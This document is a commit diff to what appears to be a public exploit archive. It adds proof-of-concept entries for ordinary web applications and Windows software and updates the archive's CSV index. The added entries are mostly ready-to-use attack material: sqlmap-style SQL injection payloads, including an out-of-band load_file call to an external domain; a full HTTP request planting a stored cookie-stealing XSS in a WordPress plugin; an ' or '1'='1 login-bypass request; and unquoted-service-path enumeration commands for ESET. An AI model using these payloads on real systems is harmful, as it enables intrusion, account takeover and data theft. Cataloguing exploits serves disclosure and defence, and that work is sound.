DB: 2024-04-04

6 changes to exploits/shellcodes/ghdb Computer Laboratory Management System v1.0 - Multiple-SQLi Petrol Pump Management Software v1.0 - Remote Code Execution (RCE) Quick CMS v6.7 en 2023 - 'password' SQLi Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS) ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
2024-04-04 00:16:33 +00:00 · 2024-04-04 00:16:33 +00:00 · a06b0db78d
commit a06b0db78d
parent a44e138f78
6 changed files with 153 additions and 1 deletions
--- a/exploits/php/webapps/51943.txt
+++ b/exploits/php/webapps/51943.txt
@ -5,6 +5,7 @@
 # Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html
 # Version: v1.0
 # Tested on: Windows 10
+# CVE: CVE-2024-29410
 # Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the logo Photos parameter in the web_crud.php component.
 # POC:
 1. Here we go to : http://127.0.0.1/fuelflow/index.php
--- a/exploits/php/webapps/51965.txt
+++ b/exploits/php/webapps/51965.txt
@ -0,0 +1,48 @@
+# Title: Computer Laboratory Management System v1.0 - Multiple-SQLi
+# Author: nu11secur1ty
+# Date: 03/28/2024
+# Vendor: https://github.com/oretnom23
+# Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400
+# Reference: https://portswigger.net/web-security/sql-injection
+
+# Description:
+The id parameter appears to be vulnerable to SQL injection attacks.
+The payload '+(select
+load_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+'
+was submitted in the id parameter. This payload injects a SQL
+sub-query that calls MySQL's load_file function with a UNC file path
+that references a URL on an external domain. The application
+interacted with that domain, indicating that the injected SQL query
+was executed. The attacker can get all information from the system by
+using this vulnerability!
+
+STATUS: HIGH- Vulnerability
+
+[+]Payload:
+```mysql
+---
+Parameter: id (GET)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
+or GROUP BY clause
+    Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN
+(2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (FLOOR)
+    Payload: page=user/manage_user&id=7''' AND (SELECT 1734
+FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT
+(ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM
+(SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU
+
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 11 columns
+    Payload: page=user/manage_user&id=-2854' UNION ALL SELECT
+NULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL#
+---
--- a/exploits/php/webapps/51966.txt
+++ b/exploits/php/webapps/51966.txt
@ -0,0 +1,28 @@
+# Exploit Title: Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS)
+# Date: 22 March 2024
+# Exploit Author: Erdemstar
+# Vendor: https://wordpress.com/
+# Version: 1.3.1
+
+# Proof Of Concept:
+1. Click Add New Watermark and enter the XSS payload into the Watermark Text.
+2. Stored XSS will run on anyone who wants to edit this page.
+
+# Vulnerable Property: watermark_title
+# PoC Video: https://youtu.be/XEe0Sno6e2g?si=mcgO6VbAwymGXcCp
+# Request:
+POST /wp-admin/post.php HTTP/2
+Host: erdemstar.local
+Cookie: wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7C50573cb574c70a41a241cb9f1f1e3ff22f539fc8630599f2503d02a6c1a7e678; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wp-settings-time-4=1711124335; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7Cdae14d9d9aa7f0c4df03783bb2bd321a5b3d6a63d8c3e1ae131dda689c595862; wp-settings-time-5=1711124723
+Content-Length: 1460
+Upgrade-Insecure-Requests: 1
+Origin: https://erdemstar.local
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Referer: https://erdemstar.local/wp-admin/post-new.php?post_type=watermark&wp-post-new-reload=true
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Priority: u=0, i
+
+_wpnonce=99a1d1e63a&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dwatermark&user_ID=5&action=editpost&originalaction=editpost&post_author=5&post_type=watermark&original_post_status=auto-draft&referredby=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&_wp_original_http_referer=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&auto_draft=1&post_ID=35&meta-box-order-nonce=ea875c0c6f&closedpostboxesnonce=d29be25ad8&post_title=&samplepermalinknonce=1e667edd3a&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=03&jj=22&aa=2024&hh=16&mn=25&ss=23&hidden_mm=03&cur_mm=03&hidden_jj=22&cur_jj=22&hidden_aa=2024&cur_aa=2024&hidden_hh=16&cur_hh=16&hidden_mn=25&cur_mn=25&original_publish=Publish&publish=Publish&tax_input%5BCategories%5D%5B%5D=0&post_name=&custom_meta_box_nonce=d1322f94a0&watermark_title=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&img_sizes%5B%5D=thumbnail&img_sizes%5B%5D=medium&img_sizes%5B%5D=large&img_sizes%5B%5D=full&txt_type=ARIAL.TTF&rgb=38%2C1%2C24&txt_size=8&color=%23260118&rotation=&opicity=100&position=top&destance_x=&mesaure_x=px&padding=&mesaure_y=px&background=yes&rgb_bg=255%2C0%2C0&bg_destance_x=&bg_padding=&color_bg=%23ff0000&image=&img_rotation=&img_opicity=100&img_position=top&img_size=4&img_destance_x=&img_mesaure_x=px&img_padding=&img_mesaure_y=px
--- a/exploits/php/webapps/51967.txt
+++ b/exploits/php/webapps/51967.txt
@ -0,0 +1,39 @@
+# Title: Quick CMS v6.7 en 2023 - 'password' SQLi
+# Author: nu11secur1ty
+# Date: 03/19/2024
+# Vendor: https://opensolution.org/
+# Software: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip
+# Reference: https://portswigger.net/web-security/sql-injection
+
+# Description: The password parameter is vulnerable for SQLi bypass authentication!
+
+[+]Payload:
+```mysql
+POST /admin.php?p=login HTTP/1.1
+Host: localpwnedhost.com
+Cookie: PHPSESSID=39eafb1sh5tqbar92054jn1cqg
+Content-Length: 92
+Cache-Control: max-age=0
+Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
+Sec-Ch-Ua-Mobile: ?0
+Sec-Ch-Ua-Platform: "Windows"
+Upgrade-Insecure-Requests: 1
+Origin: https://localpwnedhost.com
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: https://localpwnedhost.com/admin.php
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en-US,en;q=0.9
+Priority: u=0, i
+Connection: close
+
+sEmail=kurec%40guhai.mi.huq&sPass=%27+or+%271%27%3D%271&bAcceptLicense=1&iAcceptLicense=true
+
+```
--- a/exploits/windows/local/51964.txt
+++ b/exploits/windows/local/51964.txt
@ -0,0 +1,32 @@
+# Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
+# Exploit Author: Milad Karimi (Ex3ptionaL)
+# Exploit Date: 2024-04-01
+# Vendor : https://www.eset.com
+# Version : 17.0.16.0
+# Tested on OS: Microsoft Windows 10 pro x64
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESET
+Security\ekrn.exe
+
+C:\>sc qc ekrn
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ekrn
+        TYPE               : 20  WIN32_SHARE_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"
+        LOAD_ORDER_GROUP   : Base
+        TAG                : 0
+        DISPLAY_NAME       : ESET Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\>systeminfo
+
+OS Name:  Microsoft Windows 10 Pro
+OS Version: 10.0.19045 N/A Build 19045
+OS Manufacturer: Microsoft Corporation
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -16242,6 +16242,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34536,exploits/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",webapps,php,,2010-08-26,2014-09-05,1,,,,,,https://www.securityfocus.com/bid/42773/info
 33178,exploits/php/webapps/33178.txt,"Computer Associates SiteMinder - '%00' Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",webapps,php,,2009-06-08,2014-05-04,1,CVE-2009-2704;OSVDB-56970,,,,,https://www.securityfocus.com/bid/36086/info
 30746,exploits/php/webapps/30746.txt,"Computer Associates SiteMinder - Web Agent Smpwservices.FCC Cross-Site Scripting",2007-11-07,"Giuseppe Gottardi",webapps,php,,2007-11-07,2014-01-06,1,CVE-2007-5923;OSVDB-40269,,,,,https://www.securityfocus.com/bid/26375/info
+51965,exploits/php/webapps/51965.txt,"Computer Laboratory Management System v1.0 - Multiple-SQLi",2024-04-03,nu11secur1ty,webapps,php,,2024-04-03,2024-04-03,0,,,,,,
 32598,exploits/php/webapps/32598.txt,"COms - 'dynamic.php' Cross-Site Scripting",2008-11-24,Pouya_Server,webapps,php,,2008-11-24,2014-03-31,1,OSVDB-50170,,,,,https://www.securityfocus.com/bid/32459/info
 29907,exploits/php/webapps/29907.txt,"Comus 2.0 - 'Accept.php' Remote File Inclusion",2007-04-25,alijsb,webapps,php,,2007-04-25,2013-11-29,1,CVE-2007-2287;OSVDB-34168,,,,,https://www.securityfocus.com/bid/23661/info
 3152,exploits/php/webapps/3152.txt,"ComVironment 4.0 - 'grab_globals.lib.php' Remote File Inclusion",2007-01-18,GoLd_M,webapps,php,,2007-01-17,2016-09-21,1,OSVDB-34621;CVE-2007-0395,,,,http://www.exploit-db.comcomvironment_4.0frc3.tar.gz,
@ -25846,7 +25847,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41586,exploits/php/webapps/41586.txt,"Pet Listing Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",webapps,php,,2017-03-11,2017-03-11,0,,,,,,
 50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-09-29,Mr.Gedik,webapps,php,,2021-09-29,2021-09-29,0,,,,,,
 38391,exploits/php/webapps/38391.txt,"Petite Annonce - Cross-Site Scripting",2013-03-14,Metropolis,webapps,php,,2013-03-14,2015-10-03,1,,,,,,https://www.securityfocus.com/bid/58508/info
-51943,exploits/php/webapps/51943.txt,"Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)",2024-04-02,"Sandeep Vishwakarma",webapps,php,,2024-04-02,2024-04-02,0,,,,,,
+51943,exploits/php/webapps/51943.txt,"Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)",2024-04-02,"Sandeep Vishwakarma",webapps,php,,2024-04-02,2024-04-03,0,CVE-2024-29410,,,,,
 51032,exploits/php/webapps/51032.py,"pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)",2023-02-20,IHTeam,webapps,php,,2023-02-20,2023-02-20,0,CVE-2022-31814,,,,,
 6442,exploits/php/webapps/6442.txt,"pForum 1.30 - 'showprofil.php' SQL Injection",2008-09-12,tmh,webapps,php,,2008-09-11,2016-12-22,1,OSVDB-48109;CVE-2008-4355,,,,,
 23901,exploits/php/webapps/23901.txt,"pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Command Execution",2013-01-05,"Yann CAM",webapps,php,,2013-01-05,2013-04-15,1,OSVDB-88930;OSVDB-88929;OSVDB-88928,,,http://www.exploit-db.com/screenshots/idlt24000/screenshot.png,,
@ -28653,6 +28654,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31481,exploits/php/webapps/31481.txt,"Quick Classifieds 1.0 - 'search_results.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php,,2008-03-24,2014-02-07,1,CVE-2008-6543;OSVDB-53025,,,,,https://www.securityfocus.com/bid/28417/info
 31514,exploits/php/webapps/31514.txt,"Quick Classifieds 1.0 - 'style/default.scheme.inc?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php,,2008-03-24,2014-02-07,1,CVE-2008-6543;OSVDB-53058,,,,,https://www.securityfocus.com/bid/28417/info
 32387,exploits/php/webapps/32387.txt,"Quick CMS Lite 2.1 - 'admin.php' Cross-Site Scripting",2008-09-16,"John Cobb",webapps,php,,2008-09-16,2014-03-20,1,CVE-2008-4139;OSVDB-48135,,,,,https://www.securityfocus.com/bid/31210/info
+51967,exploits/php/webapps/51967.txt,"Quick CMS v6.7 en 2023 - 'password' SQLi",2024-04-03,nu11secur1ty,webapps,php,,2024-04-03,2024-04-03,0,,,,,,
 45698,exploits/php/webapps/45698.txt,"Quick Count 2.0 - 'txtInstID' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,,2018-10-26,2018-10-26,0,,,,,http://www.exploit-db.comQCLxDwn_200.zip,
 10837,exploits/php/webapps/10837.txt,"Quick Poll - 'code.php?id' SQL Injection",2009-12-31,"Hussin X",webapps,php,,2009-12-30,,1,,,,,,
 7105,exploits/php/webapps/7105.txt,"Quick Poll Script - 'id' SQL Injection",2008-11-12,"Hussin X",webapps,php,,2008-11-11,2017-01-02,1,OSVDB-47814;CVE-2008-3765,,,,,
@ -32880,6 +32882,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 37902,exploits/php/webapps/37902.php,"WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",webapps,php,,2012-10-01,2015-08-21,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/55749/info
 30036,exploits/php/webapps/30036.html,"WordPress Plugin Akismet 2.1.3 - Cross-Site Scripting",2007-05-14,"David Kierznowski",webapps,php,,2007-05-14,2017-11-22,1,CVE-2007-2714;OSVDB-37290,"WordPress Plugin",,,,https://www.securityfocus.com/bid/23965/info
 37464,exploits/php/webapps/37464.txt,"WordPress Plugin Albo Pretorio Online 3.2 - Multiple Vulnerabilities",2015-07-02,"Alessandro Cingolani",webapps,php,80,2015-07-02,2015-07-02,0,OSVDB-124060;OSVDB-124058;OSVDB-124057;OSVDB-124056;OSVDB-124055;OSVDB-124054;OSVDB-124053,,,,http://www.exploit-db.comalbo-pretorio-on-line.3.2.zip,
+51966,exploits/php/webapps/51966.txt,"Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS)",2024-04-03,Erdemstar,webapps,php,,2024-04-03,2024-04-03,0,,,,,,
 36323,exploits/php/webapps/36323.txt,"WordPress Plugin Alert Before Your Post - 'name' Cross-Site Scripting",2011-11-21,Am!r,webapps,php,,2011-11-21,2015-03-11,1,CVE-2011-5107;OSVDB-77475,"WordPress Plugin",,,,https://www.securityfocus.com/bid/50743/info
 45056,exploits/php/webapps/45056.txt,"WordPress Plugin All In One Favicon 4.6 - (Authenticated) Cross-Site Scripting",2018-07-19,"Javier Olmedo",webapps,php,80,2018-07-19,2018-07-20,0,CVE-2018-13832,"Cross-Site Scripting (XSS)",,,,
 40082,exploits/php/webapps/40082.txt,"WordPress Plugin All in One SEO Pack 2.3.6.1 - Persistent Cross-Site Scripting",2016-07-11,"David Vaartjes",webapps,php,80,2016-07-11,2016-07-11,0,,,,,http://www.exploit-db.comall-in-one-seo-pack.2.3.6.1.zip,
@ -40185,6 +40188,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquoted Service Path",2021-02-09,"Hector Gerbacio",local,windows,,2021-02-09,2021-02-17,0,,,,,,
 25448,exploits/windows/local/25448.rb,"ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,local,windows,,2013-05-14,2013-05-14,1,CVE-2013-0726;OSVDB-92694,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/51725/
 26708,exploits/windows/local/26708.rb,"ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-07-09,Metasploit,local,windows,,2013-07-09,2013-07-09,1,CVE-2013-3482;OSVDB-93650,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/53620/
+51964,exploits/windows/local/51964.txt,"ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path",2024-04-03,"Milad karimi",local,windows,,2024-04-03,2024-04-03,0,,,,,,
 51351,exploits/windows/local/51351.txt,"ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path",2023-04-08,"Milad karimi",local,windows,,2023-04-08,2023-04-08,0,,,,,,
 7516,exploits/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Local Privilege Escalation",2008-12-18,"NT Internals",local,windows,,2008-12-17,,1,CVE-2008-5724;OSVDB-50942,,2008-Epfw_Exp.zip,,,
 17880,exploits/windows/local/17880.rb,"eSignal and eSignal Pro 10.6.2425.1208 - File Parsing Buffer Overflow in QUO (Metasploit)",2011-09-20,Metasploit,local,windows,,2011-09-21,2011-09-21,1,CVE-2011-3494;OSVDB-75456,"Metasploit Framework (MSF)",,,,